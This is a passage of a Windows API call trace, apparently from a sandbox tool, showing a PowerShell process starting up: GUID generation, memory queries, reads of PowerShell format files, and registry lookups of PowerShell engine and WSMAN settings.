	[0322.070] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xda210a2a, Data2=0xb32f, Data3=0x44f3, Data4=([0]=0x8e, [1]=0x5d, [2]=0xc7, [3]=0x55, [4]=0xc3, [5]=0xe7, [6]=0xf, [7]=0x5b))) returned 0x0
	[0322.070] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x75c0e525, Data2=0xa598, Data3=0x4e50, Data4=([0]=0xb0, [1]=0x71, [2]=0x15, [3]=0xc9, [4]=0x38, [5]=0x4a, [6]=0x84, [7]=0x37))) returned 0x0
	[0322.070] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x343e91b3, Data2=0x4a6, Data3=0x497e, Data4=([0]=0xa0, [1]=0xb5, [2]=0x29, [3]=0xcc, [4]=0x61, [5]=0x4e, [6]=0x8f, [7]=0x6b))) returned 0x0
	[0322.070] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xc48310e0, Data2=0x1fcc, Data3=0x4145, Data4=([0]=0xa2, [1]=0x10, [2]=0x30, [3]=0xd6, [4]=0x4d, [5]=0x57, [6]=0x85, [7]=0xdd))) returned 0x0
	[0322.071] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0322.071] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x5de2ff33, Data2=0x42c1, Data3=0x40c5, Data4=([0]=0xae, [1]=0xe3, [2]=0x50, [3]=0x61, [4]=0x79, [5]=0xa7, [6]=0x68, [7]=0x6d))) returned 0x0
	[0322.071] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0322.072] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0322.072] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xcf1828b7, Data2=0xf408, Data3=0x4f7d, Data4=([0]=0xb7, [1]=0x68, [2]=0xe9, [3]=0x18, [4]=0xd8, [5]=0x3e, [6]=0x22, [7]=0xaf))) returned 0x0
	[0322.072] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0322.072] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xd66625ac, Data2=0x201c, Data3=0x4e6e, Data4=([0]=0x98, [1]=0x6e, [2]=0x5, [3]=0xa8, [4]=0xe0, [5]=0xfd, [6]=0xef, [7]=0x4c))) returned 0x0
	[0322.073] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xcbf4a970, Data2=0x8832, Data3=0x4dfb, Data4=([0]=0x8d, [1]=0xa7, [2]=0xa, [3]=0x46, [4]=0x45, [5]=0x12, [6]=0x9d, [7]=0xd8))) returned 0x0
	[0322.073] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x879d7d14, Data2=0x84a4, Data3=0x4033, Data4=([0]=0x94, [1]=0xed, [2]=0x52, [3]=0xd2, [4]=0xb9, [5]=0xca, [6]=0x4e, [7]=0xcc))) returned 0x0
	[0322.073] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xa89e851b, Data2=0x3470, Data3=0x4acb, Data4=([0]=0xb2, [1]=0x70, [2]=0x3b, [3]=0xb, [4]=0x67, [5]=0x8b, [6]=0x88, [7]=0xde))) returned 0x0
	[0322.073] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xd257b3f7, Data2=0x741d, Data3=0x437a, Data4=([0]=0xa6, [1]=0x3b, [2]=0xb2, [3]=0xde, [4]=0xa, [5]=0x4, [6]=0x34, [7]=0xc2))) returned 0x0
	[0322.073] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x2e0a74a0, Data2=0x92ce, Data3=0x44be, Data4=([0]=0x99, [1]=0xa9, [2]=0xdd, [3]=0xb0, [4]=0x48, [5]=0x3f, [6]=0x77, [7]=0x37))) returned 0x0
	[0322.073] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xe06952ea, Data2=0x247f, Data3=0x4dd0, Data4=([0]=0xad, [1]=0xd0, [2]=0x30, [3]=0x85, [4]=0xfd, [5]=0x2d, [6]=0x7a, [7]=0xf1))) returned 0x0
	[0322.074] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0322.074] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x6168ce8c, Data2=0xaabc, Data3=0x4bab, Data4=([0]=0xb8, [1]=0x8a, [2]=0xe1, [3]=0xc2, [4]=0xf0, [5]=0x79, [6]=0x2, [7]=0x9d))) returned 0x0
	[0322.074] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x7b19b53c, Data2=0xb9df, Data3=0x4276, Data4=([0]=0x92, [1]=0xb1, [2]=0xc3, [3]=0x44, [4]=0x8f, [5]=0x77, [6]=0x4, [7]=0xdb))) returned 0x0
	[0322.074] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xd69fb971, Data2=0x9a36, Data3=0x40bd, Data4=([0]=0x83, [1]=0x7d, [2]=0x1e, [3]=0xf7, [4]=0x44, [5]=0x22, [6]=0x1d, [7]=0x25))) returned 0x0
	[0322.074] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x541fc52d, Data2=0xf35f, Data3=0x42ae, Data4=([0]=0xb8, [1]=0xca, [2]=0xea, [3]=0x8e, [4]=0xb8, [5]=0xf2, [6]=0xe, [7]=0x89))) returned 0x0
	[0322.074] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xdce926b2, Data2=0x4ab2, Data3=0x462d, Data4=([0]=0x83, [1]=0x51, [2]=0x4b, [3]=0xec, [4]=0x43, [5]=0x13, [6]=0x77, [7]=0x27))) returned 0x0
	[0322.075] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0322.075] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xb355604f, Data2=0xc3b4, Data3=0x456c, Data4=([0]=0xa2, [1]=0x41, [2]=0x31, [3]=0x9c, [4]=0xf5, [5]=0x51, [6]=0xda, [7]=0x82))) returned 0x0
	[0322.075] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xc1c5a08e, Data2=0x626a, Data3=0x4ea6, Data4=([0]=0x8c, [1]=0xd, [2]=0x2c, [3]=0x99, [4]=0x6, [5]=0xf5, [6]=0x18, [7]=0x3a))) returned 0x0
	[0322.075] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0322.075] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0322.075] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0322.075] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0322.076] SetErrorMode (uMode=0x1) returned 0x1
	[0322.076] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0322.076] GetFileType (hFile=0x32c) returned 0x1
	[0322.076] SetErrorMode (uMode=0x1) returned 0x1
	[0322.076] GetFileType (hFile=0x32c) returned 0x1
	[0322.076] ReadFile (in: hFile=0x32c, lpBuffer=0x313b3d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x313b3d0*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.077] ReadFile (in: hFile=0x32c, lpBuffer=0x313b3d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x313b3d0*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.077] ReadFile (in: hFile=0x32c, lpBuffer=0x313b3d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x313b3d0*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.077] ReadFile (in: hFile=0x32c, lpBuffer=0x313b3d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x313b3d0*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.077] ReadFile (in: hFile=0x32c, lpBuffer=0x313b3d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x313b3d0*, lpNumberOfBytesRead=0x1cd218*=0x8b4, lpOverlapped=0x0) returned 1
	[0322.078] ReadFile (in: hFile=0x32c, lpBuffer=0x313a7ec, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x313a7ec*, lpNumberOfBytesRead=0x1cd218*=0x0, lpOverlapped=0x0) returned 1
	[0322.078] ReadFile (in: hFile=0x32c, lpBuffer=0x313b3d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x313b3d0*, lpNumberOfBytesRead=0x1cd218*=0x0, lpOverlapped=0x0) returned 1
	[0322.078] SetErrorMode (uMode=0x1) returned 0x1
	[0322.078] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd1c0 | out: lpFileInformation=0x1cd1c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0322.078] SetErrorMode (uMode=0x1) returned 0x1
	[0322.078] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd2a8 | out: phkResult=0x1cd2a8*=0x32c) returned 0x0
	[0322.078] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd22c, lpData=0x0, lpcbData=0x1cd228*=0x0 | out: lpType=0x1cd22c*=0x1, lpData=0x0, lpcbData=0x1cd228*=0x56) returned 0x0
	[0322.078] CoTaskMemAlloc (cb=0x5a) returned 0x3d7030
	[0322.078] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd1fc, lpData=0x3d7030, lpcbData=0x1cd1f8*=0x56 | out: lpType=0x1cd1fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd1f8*=0x56) returned 0x0
	[0322.078] CoTaskMemFree (pv=0x3d7030) 
	[0322.079] RegCloseKey (hKey=0x32c) returned 0x0
	[0322.079] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xb927c683, Data2=0xe3db, Data3=0x4e2f, Data4=([0]=0xb6, [1]=0x47, [2]=0x22, [3]=0xf3, [4]=0xb6, [5]=0x50, [6]=0x53, [7]=0xab))) returned 0x0
	[0322.079] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x5937da22, Data2=0x53ce, Data3=0x479d, Data4=([0]=0xb7, [1]=0xec, [2]=0xa6, [3]=0x9f, [4]=0x38, [5]=0x68, [6]=0x82, [7]=0xd8))) returned 0x0
	[0322.079] SetErrorMode (uMode=0x1) returned 0x1
	[0322.079] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0322.080] GetFileType (hFile=0x32c) returned 0x1
	[0322.080] SetErrorMode (uMode=0x1) returned 0x1
	[0322.080] GetFileType (hFile=0x32c) returned 0x1
	[0322.080] ReadFile (in: hFile=0x32c, lpBuffer=0x31791b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x31791b8*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.081] ReadFile (in: hFile=0x32c, lpBuffer=0x31791b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x31791b8*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.081] ReadFile (in: hFile=0x32c, lpBuffer=0x31791b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x31791b8*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.081] ReadFile (in: hFile=0x32c, lpBuffer=0x31791b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x31791b8*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.081] ReadFile (in: hFile=0x32c, lpBuffer=0x31791b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x31791b8*, lpNumberOfBytesRead=0x1cd218*=0xe98, lpOverlapped=0x0) returned 1
	[0322.081] ReadFile (in: hFile=0x32c, lpBuffer=0x31787b8, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x31787b8*, lpNumberOfBytesRead=0x1cd218*=0x0, lpOverlapped=0x0) returned 1
	[0322.081] ReadFile (in: hFile=0x32c, lpBuffer=0x31791b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x31791b8*, lpNumberOfBytesRead=0x1cd218*=0x0, lpOverlapped=0x0) returned 1
	[0322.082] SetErrorMode (uMode=0x1) returned 0x1
	[0322.082] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd1c0 | out: lpFileInformation=0x1cd1c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0322.082] SetErrorMode (uMode=0x1) returned 0x1
	[0322.082] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd2a8 | out: phkResult=0x1cd2a8*=0x32c) returned 0x0
	[0322.082] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd22c, lpData=0x0, lpcbData=0x1cd228*=0x0 | out: lpType=0x1cd22c*=0x1, lpData=0x0, lpcbData=0x1cd228*=0x56) returned 0x0
	[0322.082] CoTaskMemAlloc (cb=0x5a) returned 0x3d7030
	[0322.082] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd1fc, lpData=0x3d7030, lpcbData=0x1cd1f8*=0x56 | out: lpType=0x1cd1fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd1f8*=0x56) returned 0x0
	[0322.082] CoTaskMemFree (pv=0x3d7030) 
	[0322.082] RegCloseKey (hKey=0x32c) returned 0x0
	[0322.083] VirtualQuery (in: lpAddress=0x1cbd40, lpBuffer=0x1ccc00, dwLength=0x30 | out: lpBuffer=0x1ccc00*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0322.083] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xa5648abb, Data2=0xbd87, Data3=0x4de2, Data4=([0]=0xb8, [1]=0xde, [2]=0xa4, [3]=0x54, [4]=0x78, [5]=0xbb, [6]=0xe7, [7]=0x4e))) returned 0x0
	[0322.083] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x59d31e4d, Data2=0x5cd3, Data3=0x4324, Data4=([0]=0xb3, [1]=0xd0, [2]=0xf8, [3]=0xfa, [4]=0x33, [5]=0x6a, [6]=0xaf, [7]=0xf9))) returned 0x0
	[0322.491] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0322.491] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.491] CoTaskMemFree (pv=0x3d2890) 
	[0322.492] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0322.492] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.492] CoTaskMemFree (pv=0x3d2890) 
	[0322.493] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0322.493] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.493] CoTaskMemFree (pv=0x3d2890) 
	[0322.495] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0322.495] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.495] CoTaskMemFree (pv=0x3d2890) 
	[0322.501] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0322.501] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.502] CoTaskMemFree (pv=0x3d2890) 
	[0322.895] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0322.895] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.895] CoTaskMemFree (pv=0x3d2890) 
	[0322.896] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0322.896] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.896] CoTaskMemFree (pv=0x3d2890) 
	[0322.900] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd4b8 | out: phkResult=0x1cd4b8*=0x32c) returned 0x0
	[0322.902] RegQueryInfoKeyW (in: hKey=0x32c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd3bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd3b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd3bc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd3b8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0322.902] CoTaskMemFree (pv=0x0) 
	[0322.902] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0322.902] RegEnumValueW (in: hKey=0x32c, dwIndex=0x0, lpValueName=0x35c680, lpcchValueName=0x1cd468, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1cd468, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0322.903] CoTaskMemFree (pv=0x35c680) 
	[0322.903] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0322.903] RegEnumValueW (in: hKey=0x32c, dwIndex=0x1, lpValueName=0x35c680, lpcchValueName=0x1cd468, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1cd468, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0322.903] CoTaskMemFree (pv=0x35c680) 
	[0322.903] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0322.903] RegEnumValueW (in: hKey=0x32c, dwIndex=0x2, lpValueName=0x35c680, lpcchValueName=0x1cd468, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1cd468, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0322.903] CoTaskMemFree (pv=0x35c680) 
	[0322.903] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd44c, lpData=0x0, lpcbData=0x1cd448*=0x0 | out: lpType=0x1cd44c*=0x1, lpData=0x0, lpcbData=0x1cd448*=0x8) returned 0x0
	[0322.903] CoTaskMemAlloc (cb=0xc) returned 0x3d67a0
	[0322.903] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd41c, lpData=0x3d67a0, lpcbData=0x1cd418*=0x8 | out: lpType=0x1cd41c*=0x1, lpData="2.0", lpcbData=0x1cd418*=0x8) returned 0x0
	[0322.903] CoTaskMemFree (pv=0x3d67a0) 
	[0323.296] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd408 | out: phkResult=0x1cd408*=0x304) returned 0x0
	[0323.296] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd30c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd308, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd30c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd308*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.296] CoTaskMemFree (pv=0x0) 
	[0323.296] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.296] RegEnumValueW (in: hKey=0x304, dwIndex=0x0, lpValueName=0x35c680, lpcchValueName=0x1cd3b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1cd3b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0323.297] CoTaskMemFree (pv=0x35c680) 
	[0323.297] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.297] RegEnumValueW (in: hKey=0x304, dwIndex=0x1, lpValueName=0x35c680, lpcchValueName=0x1cd3b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1cd3b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0323.297] CoTaskMemFree (pv=0x35c680) 
	[0323.297] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.297] RegEnumValueW (in: hKey=0x304, dwIndex=0x2, lpValueName=0x35c680, lpcchValueName=0x1cd3b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1cd3b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0323.297] CoTaskMemFree (pv=0x35c680) 
	[0323.297] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd39c, lpData=0x0, lpcbData=0x1cd398*=0x0 | out: lpType=0x1cd39c*=0x1, lpData=0x0, lpcbData=0x1cd398*=0x8) returned 0x0
	[0323.297] CoTaskMemAlloc (cb=0xc) returned 0x3d6820
	[0323.297] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd36c, lpData=0x3d6820, lpcbData=0x1cd368*=0x8 | out: lpType=0x1cd36c*=0x1, lpData="2.0", lpcbData=0x1cd368*=0x8) returned 0x0
	[0323.297] CoTaskMemFree (pv=0x3d6820) 
	[0323.610] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0323.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0323.610] CoTaskMemFree (pv=0x3d2890) 
	[0323.615] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0323.615] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0323.615] CoTaskMemFree (pv=0x3d2890) 
